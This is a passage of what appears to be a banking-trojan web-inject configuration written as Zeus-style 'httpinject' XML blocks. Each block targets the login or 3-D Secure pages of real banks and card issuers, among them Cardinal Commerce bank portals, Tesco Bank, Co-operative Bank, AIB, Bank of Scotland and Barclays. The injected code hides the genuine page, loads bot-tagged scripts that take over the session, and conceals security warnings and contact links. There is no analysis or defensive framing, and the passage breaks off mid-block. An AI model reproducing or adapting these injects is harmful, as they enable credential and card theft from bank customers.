1218. <conditions>
1219. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://acs4\.3dsecure\.no/mdpayacs/pareq.*]]></url>
1220. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1221. </url>
1222. </conditions>
1223. <actions>
1224. <modify>
1225. <pattern modifiers="msU"><![CDATA[(\<HEAD.*\>)]]></pattern>
1226. <replacement><![CDATA[\1<style type="text/css">
1227. body {visibility: hidden; }
1228. </style>
1229. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1230. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=3dsecure.no.acs4"></script>]]></replacement>
1231. </modify>
1232. </actions>
1233. </httpinject>
1234. <httpinject>
1235. <conditions>
1236. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://avantcard\.cardinalcommerce\.com/transaction/.*]]></url>
1237. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1238. </url>
1239. </conditions>
1240. <actions>
1241. <modify>
1242. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1243. <replacement><![CDATA[\1<style type="text/css">
1244. body {visibility: hidden; }
1245. </style>
1246. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1247. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.avantcard"></script>]]></replacement>
1248. </modify>
1249. </actions>
1250. </httpinject>
1251. <httpinject>
1252. <conditions>
1253. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://ubi\.electracard\.com/ubi/jsp/.*]]></url>
1254. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1255. </url>
1256. </conditions>
1257. <actions>
1258. <modify>
1259. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1260. <replacement><![CDATA[\1<style type="text/css">
1261. body {visibility: hidden; }
1262. </style>
1263. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1264. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=electracard.ubi"></script>]]></replacement>
1265. </modify>
1266. </actions>
1267. </httpinject>
1268. <httpinject>
1269. <conditions>
1270. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://cbi\.electracard\.com/cbi/jsp/.*]]></url>
1271. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1272. </url>
1273. </conditions>
1274. <actions>
1275. <modify>
1276. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1277. <replacement><![CDATA[\1<style type="text/css">
1278. body {visibility: hidden; }
1279. </style>
1280. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1281. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=electracard.cbi"></script>]]></replacement>
1282. </modify>
1283. </actions>
1284. </httpinject>
1285. <httpinject>
1286. <conditions>
1287. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://sibacs\.electrapay\.com/SouthIndianBank/jsp/.*]]></url>
1288. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1289. </url>
1290. </conditions>
1291. <actions>
1292. <modify>
1293. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1294. <replacement><![CDATA[\1<style type="text/css">
1295. body {visibility: hidden; }
1296. </style>
1297. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1298. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=electracard.sibacs"></script>]]></replacement>
1299. </modify>
1300. </actions>
1301. </httpinject>
1302. <httpinject>
1303. <conditions>
1304. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://santanderpbvisa\.cardinalcommerce\.com/.*]]></url>
1305. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1306. </url>
1307. </conditions>
1308. <actions>
1309. <modify>
1310. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1311. <replacement><![CDATA[\1<style type="text/css">
1312. body {visibility: hidden; }
1313. </style>
1314. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1315. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.santanderpbvisa"></script>]]></replacement>
1316. </modify>
1317. </actions>
1318. </httpinject>
1319. <httpinject>
1320. <conditions>
1321. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://santanderpbmc\.cardinalcommerce\.com/.*]]></url>
1322. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1323. </url>
1324. </conditions>
1325. <actions>
1326. <modify>
1327. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1328. <replacement><![CDATA[\1<style type="text/css">
1329. body {visibility: hidden; }
1330. </style>
1331. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1332. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.santanderpbmc"></script>]]></replacement>
1333. </modify>
1334. </actions>
1335. </httpinject>
1336. <httpinject>
1337. <conditions>
1338. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://thinkmoney\.cardinalcommerce\.com/.*]]></url>
1339. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1340. </url>
1341. </conditions>
1342. <actions>
1343. <modify>
1344. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1345. <replacement><![CDATA[\1<style type="text/css">
1346. body {visibility: hidden; }
1347. </style>
1348. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1349. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.thinkmoney"></script>]]></replacement>
1350. </modify>
1351. </actions>
1352. </httpinject>
1353. <httpinject>
1354. <conditions>
1355. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://kfh-b\.cardinalcommerce\.com/transaction/.*]]></url>
1356. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1357. </url>
1358. </conditions>
1359. <actions>
1360. <modify>
1361. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1362. <replacement><![CDATA[\1<style type="text/css">
1363. body {visibility: hidden; }
1364. </style>
1365. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1366. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.kfh-b"></script>]]></replacement>
1367. </modify>
1368. </actions>
1369. </httpinject>
1370. <httpinject>
1371. <conditions>
1372. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://ibqmc\.cardinalcommerce\.com/.*]]></url>
1373. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1374. </url>
1375. </conditions>
1376. <actions>
1377. <modify>
1378. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1379. <replacement><![CDATA[\1<style type="text/css">
1380. body {visibility: hidden; }
1381. </style>
1382. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1383. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.ibqmc"></script>]]></replacement>
1384. </modify>
1385. </actions>
1386. </httpinject>
1387. <httpinject>
1388. <conditions>
1389. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://stanbicibtcbankweb\.cardinalcommerce\.com/transaction/.*]]></url>
1390. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1391. </url>
1392. </conditions>
1393. <actions>
1394. <modify>
1395. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1396. <replacement><![CDATA[\1<style type="text/css">
1397. body {visibility: hidden; }
1398. </style>
1399. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1400. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.stanbicibtcbankweb"></script>]]></replacement>
1401. </modify>
1402. </actions>
1403. </httpinject>
1404. <httpinject>
1405. <conditions>
1406. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://eurobankvisa\.cardinalcommerce\.com/.*]]></url>
1407. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1408. </url>
1409. </conditions>
1410. <actions>
1411. <modify>
1412. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1413. <replacement><![CDATA[\1<style type="text/css">
1414. body {visibility: hidden; }
1415. </style>
1416. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1417. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.eurobankvisa"></script>]]></replacement>
1418. </modify>
1419. </actions>
1420. </httpinject>
1421. <httpinject>
1422. <conditions>
1423. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://ibqvisa\.cardinalcommerce\.com/.*]]></url>
1424. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1425. </url>
1426. </conditions>
1427. <actions>
1428. <modify>
1429. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1430. <replacement><![CDATA[\1<style type="text/css">
1431. body {visibility: hidden; }
1432. </style>
1433. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1434. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.ibqvisa"></script>]]></replacement>
1435. </modify>
1436. </actions>
1437. </httpinject>
1438. <httpinject>
1439. <conditions>
1440. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://ubagroup\.cardinalcommerce\.com/transaction/.*]]></url>
1441. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1442. </url>
1443. </conditions>
1444. <actions>
1445. <modify>
1446. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1447. <replacement><![CDATA[\1<style type="text/css">
1448. body {visibility: hidden; }
1449. </style>
1450. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1451. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.ubagroup"></script>]]></replacement>
1452. </modify>
1453. </actions>
1454. </httpinject>
1455. <httpinject>
1456. <conditions>
1457. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://sambabankmc\.cardinalcommerce\.com/.*]]></url>
1458. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1459. </url>
1460. </conditions>
1461. <actions>
1462. <modify>
1463. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1464. <replacement><![CDATA[\1<style type="text/css">
1465. body {visibility: hidden; }
1466. </style>
1467. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1468. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.sambabankmc"></script>]]></replacement>
1469. </modify>
1470. </actions>
1471. </httpinject>
1472. <httpinject>
1473. <conditions>
1474. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://eurobankmc\.cardinalcommerce\.com/.*]]></url>
1475. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1476. </url>
1477. </conditions>
1478. <actions>
1479. <modify>
1480. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1481. <replacement><![CDATA[\1<style type="text/css">
1482. body {visibility: hidden; }
1483. </style>
1484. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1485. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.eurobankmc"></script>]]></replacement>
1486. </modify>
1487. </actions>
1488. </httpinject>
1489. <httpinject>
1490. <conditions>
1491. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://savcreditmc\.cardinalcommerce\.com/.*]]></url>
1492. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1493. </url>
1494. </conditions>
1495. <actions>
1496. <modify>
1497. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1498. <replacement><![CDATA[\1<style type="text/css">
1499. body {visibility: hidden; }
1500. </style>
1501. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1502. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.savcreditmc"></script>]]></replacement>
1503. </modify>
1504. </actions>
1505. </httpinject>
1506. <httpinject>
1507. <conditions>
1508. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://savcreditvisa\.cardinalcommerce\.com/.*]]></url>
1509. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1510. </url>
1511. </conditions>
1512. <actions>
1513. <modify>
1514. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1515. <replacement><![CDATA[\1<style type="text/css">
1516. body {visibility: hidden; }
1517. </style>
1518. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1519. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.savcreditvisa"></script>]]></replacement>
1520. </modify>
1521. </actions>
1522. </httpinject>
1523. <httpinject>
1524. <conditions>
1525. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://sambabankvisa\.cardinalcommerce\.com/.*]]></url>
1526. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1527. </url>
1528. </conditions>
1529. <actions>
1530. <modify>
1531. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1532. <replacement><![CDATA[\1<style type="text/css">
1533. body {visibility: hidden; }
1534. </style>
1535. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1536. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.sambabankvisa"></script>]]></replacement>
1537. </modify>
1538. </actions>
1539. </httpinject>
1540. <httpinject>
1541. <conditions>
1542. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://alphabank\.cardinalcommerce\.com/transaction/.*]]></url>
1543. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1544. </url>
1545. </conditions>
1546. <actions>
1547. <modify>
1548. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1549. <replacement><![CDATA[\1<style type="text/css">
1550. body {visibility: hidden; }
1551. </style>
1552. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1553. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.alphabank"></script>]]></replacement>
1554. </modify>
1555. </actions>
1556. </httpinject>
1557. <httpinject>
1558. <conditions>
1559. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://marfinbank\.cardinalcommerce\.com/transaction/.*]]></url>
1560. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1561. </url>
1562. </conditions>
1563. <actions>
1564. <modify>
1565. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1566. <replacement><![CDATA[\1<style type="text/css">
1567. body {visibility: hidden; }
1568. </style>
1569. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1570. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=cardinalcommerce.marfinbank"></script>]]></replacement>
1571. </modify>
1572. </actions>
1573. </httpinject>
1574. <httpinject>
1575. <conditions>
1576. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.monetaonline\.it/acs/insertPassword\?brand\=MasterCard.*]]></url>
1577. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1578. </url>
1579. </conditions>
1580. <actions>
1581. <modify>
1582. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1583. <replacement><![CDATA[\1<style type="text/css">
1584. body {visibility: hidden; }
1585. </style>
1586. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1587. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=monetaonline.mc"></script>]]></replacement>
1588. </modify>
1589. </actions>
1590. </httpinject>
1591. <httpinject>
1592. <conditions>
1593. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://www\.monetaonline\.it/acs/insertPassword\?brand\=Visa.*]]></url>
1594. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1595. </url>
1596. </conditions>
1597. <actions>
1598. <modify>
1599. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1600. <replacement><![CDATA[\1<style type="text/css">
1601. body {visibility: hidden; }
1602. </style>
1603. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1604. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=monetaonline.visa"></script>]]></replacement>
1605. </modify>
1606. </actions>
1607. </httpinject>
1608. <httpinject>
1609. <conditions>
1610. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://acs\.sia\.eu/cartasi/pareq/.*]]></url>
1611. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1612. </url>
1613. </conditions>
1614. <actions>
1615. <modify>
1616. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1617. <replacement><![CDATA[\1<style type="text/css">
1618. body {visibility: hidden; }
1619. </style>
1620. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1621. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=sia"></script>]]></replacement>
1622. </modify>
1623. </actions>
1624. </httpinject>
1625. <httpinject>
1626. <conditions>
1627. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://secure\.edb\.com/d3SecureAuthce2/d3Secure/authentication/post.*]]></url>
1628. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1629. </url>
1630. </conditions>
1631. <actions>
1632. <modify>
1633. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1634. <replacement><![CDATA[\1<style type="text/css">
1635. body {visibility: hidden; }
1636. </style>
1637. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1638. <script type="text/javascript" language="JavaScript" src="/logs/dtukvbv/js.php?botid=$_BOT_ID_$&type=js&system=edb"></script>]]></replacement>
1639. </modify>
1640. </actions>
1641. </httpinject>
1642. <httpinject>
1643. <conditions>
1644. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://.*personal\.co-operativebank\.co\.uk.*]]></url>
1645. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1646. </url>
1647. <botnet type="allow" id="1" />
1648. </conditions>
1649. <actions>
1650. <modify>
1651. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1652. <replacement><![CDATA[\1<style type="text/css">
1653. body {visibility: hidden; }
1654. </style>
1655. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1656. <script type="text/javascript">var jq = jQuery.noConflict();</script>
1657. <script type="text/javascript" src="webstsomni.js?system=172"></script>]]></replacement>
1658. </modify>
1659. </actions>
1660. </httpinject>
1661. <httpinject>
1662. <conditions>
1663. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://login\.myproducts\.tescobank\.com/arcotafm/saml/controllerCustomTB\.jsp.*]]></url>
1664. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
1665. </url>
1666. <botnet type="allow" id="1" />
1667. </conditions>
1668. <actions>
1669. <modify>
1670. <pattern modifiers="msU"><![CDATA[(\<body.*\>)]]></pattern>
1671. <replacement><![CDATA[\1<style type="text/css">
1672. body {visibility: hidden; }
1673. </style>
1674. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
1675. <script type="text/javascript">var jq = jQuery.noConflict();</script>
1676. <script type="text/javascript" src="webstsomni.js?system=171"></script>]]></replacement>
1677. </modify>
1678. </actions>
1679. </httpinject>
1680. <httpinject>
1681. <conditions>
1682. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://corporate\.adcb\.com/corporateWeb/</url>
1683. </conditions>
1684. <actions>
1685. <modify>
1686. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1687. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
1688. </modify>
1689. </actions>
1690. </httpinject>
1691. <httpinject>
1692. <conditions>
1693. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ibb\.aibgb1\.co\.uk/ibb/controller</url>
1694. </conditions>
1695. <actions>
1696. <modify>
1697. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1698. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
1699. </modify>
1700. </actions>
1701. </httpinject>
1702. <httpinject>
1703. <conditions>
1704. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ibusinessbanking\.aib\.ie/ibb/controller</url>
1705. </conditions>
1706. <actions>
1707. <modify>
1708. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1709. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
1710. </modify>
1711. </actions>
1712. </httpinject>
1713. <httpinject>
1714. <conditions>
1715. <url type="allow" onpost="1" onget="1" modifiers="iU">^http://business.aib.ie/(business|)login</url>
1716. </conditions>
1717. <actions>
1718. <modify>
1719. <pattern modifiers="i"><![CDATA[(alt="Secuirty Alert")]]></pattern>
1720. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
1721. </modify>
1722. <modify>
1723. <pattern modifiers="i"><![CDATA[(<div class="content parsys"><div class="parsys_column colctrl\-4c")]]></pattern>
1724. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
1725. </modify>
1726. <modify>
1727. <pattern modifiers="i"><![CDATA[<div class="parbase ibbLauncher section">]]></pattern>
1728. <replacement><![CDATA[<div><img src="/etc/designs/default/0.gif" class="cq-dd-image cq-image-placeholder" alt="" title="" id="cq-gen321"><div class="clear"></div><div class="product"><div class="action no-padding"><div class="button"><a data-text="Business Log In" href="javascript:void(window.open('https://ibusinessbanking.aib.ie/ibb/controller?reqID=login', 'example1', 'top=1, left=1, width=790, height=522, location=no, menubar=no, status=yes, toolbar=no, scrollbars=no, resizable=no'))" rel="nofollow">LOG IN TO IBB</a> </div></div></div></div><div class="parbase ibbLauncher section" style="display:none;">]]></replacement>
1729. </modify>
1730. </actions>
1731. </httpinject>
1732. <httpinject>
1733. <conditions>
1734. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://online\.adambank\.com/eBankingAdamLogin/login</url>
1735. </conditions>
1736. <actions>
1737. <modify>
1738. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
1739. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
1740. </modify>
1741. </actions>
1742. </httpinject>
1743. <httpinject>
1744. <conditions>
1745. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.mybusinessbank\.co\.uk/cs70\_banking/logon/slogon</url>
1746. </conditions>
1747. <actions>
1748. <modify>
1749. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1750. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
1751. </modify>
1752. </actions>
1753. </httpinject>
1754. <httpinject>
1755. <conditions>
1756. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://leumionline\.bankleumi\.co\.uk/my\.policy</url>
1757. </conditions>
1758. <actions>
1759. <modify>
1760. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1761. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
1762. </modify>
1763. </actions>
1764. </httpinject>
1765. <httpinject>
1766. <conditions>
1767. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://online\.bankofcyprus\.co\.uk/netteller/login\.faces</url>
1768. </conditions>
1769. <actions>
1770. <modify>
1771. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1772. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
1773. </modify>
1774. <modify>
1775. <pattern modifiers="i"><![CDATA[(id="form:gridPanel61" style=")]]></pattern>
1776. <replacement><![CDATA[\1display:none;]]></replacement>
1777. </modify>
1778. </actions>
1779. </httpinject>
1780. <httpinject>
1781. <conditions>
1782. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.boi\-bol\.com/newHome\.jsp</url>
1783. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.boi\-bol\.com/comLogon\.jsp</url>
1784. </conditions>
1785. <actions>
1786. <modify>
1787. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1788. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
1789. </modify>
1790. <modify>
1791. <pattern modifiers="i"><![CDATA[font\-weight: bold;" title="Contact Us"]]></pattern>
1792. <replacement><![CDATA[visibility:hidden;font-weight: bold;" title="Contact Us"]]></replacement>
1793. </modify>
1794. <modify>
1795. <pattern modifiers="i"><![CDATA[(div class="securityInfo")]]></pattern>
1796. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
1797. </modify>
1798. <modify>
1799. <pattern modifiers="i"><![CDATA[(id="javaAppletDiv")]]></pattern>
1800. <replacement><![CDATA[\1 style="min-height:auto;"]]></replacement>
1801. </modify>
1802. </actions>
1803. </httpinject>
1804. <httpinject>
1805. <conditions>
1806. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://banking\.bankofscotland\.co\.uk/Logon/Logon\.aspx(\?|$)
1807. </url>
1808. </conditions>
1809. <actions>
1810. <modify>
1811. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1812. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
1813. </modify>
1814. <modify>
1815. <pattern modifiers="i"><![CDATA[ class="message">Reminder.*</span>]]></pattern>
1816. <replacement><![CDATA[></span>]]></replacement>
1817. </modify>
1818. </actions>
1819. </httpinject>
1820. <httpinject>
1821. <conditions>
1822. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://online\-business\.bankofscotland\.co\.uk/business/logon/login\.jsp(\?|$)
1823. </url>
1824. </conditions>
1825. <actions>
1826. <modify>
1827. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1828. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
1829. </modify>
1830. </actions>
1831. </httpinject>
1832. <httpinject>
1833. <conditions>
1834. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://cashmanagement\.barclays\.net/portalservices/forms/login\.pser
1835. </url>
1836. </conditions>
1837. <actions>
1838. <modify>
1839. <pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern>
1840. <replacement><![CDATA[\1
